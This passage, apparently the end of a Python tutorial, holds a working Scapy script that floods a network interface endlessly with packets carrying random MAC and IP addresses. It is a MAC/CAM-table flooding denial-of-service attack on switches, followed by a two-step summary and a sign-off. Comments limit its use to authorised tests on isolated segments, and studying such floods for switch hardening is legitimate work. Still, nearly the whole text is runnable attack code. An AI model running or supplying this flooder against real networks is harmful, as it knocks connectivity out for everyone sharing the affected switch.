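packet = Ether(src=RandMAC("*:*:*:*:*:*"), dst=RandMAC("*:*:*:*:*:*")) / \
    IP(src=RandIP("*.*.*.*"), dst=RandIP("*.*.*.*")) / \
    ICMP()

# Interface to flood: first argument, or eth0 by default.
if len(sys.argv) < 2:
    dev = "eth0"
else:
    dev = sys.argv[1]

# print() with one argument works on Python 2 and 3; the original's bare
# `print` statement was Python-2-only.
print("Flooding net with random packets on dev " + dev)

# loop=1 sends forever (Ctrl-C to stop) and needs root for the raw socket.
# This is a denial-of-service test: run it only against switches you own or
# are authorised to test, on an isolated segment.  A switch with port
# security / a MAC limit will usually shut the port rather than fail open,
# so expect to lose connectivity on that port.
sendp(packet, iface=dev, loop=1)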

Summary

  1. Generate the packet.
  2. use the specific function to send the packet.

:) life is short, so use python!
